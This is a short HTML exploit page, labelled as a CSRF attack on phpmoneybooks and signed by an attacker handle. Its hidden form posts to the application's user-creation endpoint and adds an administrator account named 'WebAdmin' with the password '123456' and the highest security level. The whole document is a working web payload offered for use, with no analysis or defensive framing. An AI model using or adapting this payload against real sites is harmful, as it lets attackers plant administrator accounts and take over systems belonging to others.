Exploit:
<html>
<head>
<title>phpmoneybooks [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/index.php?module=users&action=adduser">
<input type="hidden" name="RealName" value="WebAdmin"/>
<input type="hidden" name="UserName" value="WebAdmin"/>
<input type="hidden" name="AcctPass" value="123456"/>
<input type="hidden" name="AcctEmail" value="honker90@vip.qq.com"/>
<input type="hidden" name="AcctSecurity" value="10"/>
<input type="hidden" name="CustSecurity" value=""/>
</form>
</body>
</html>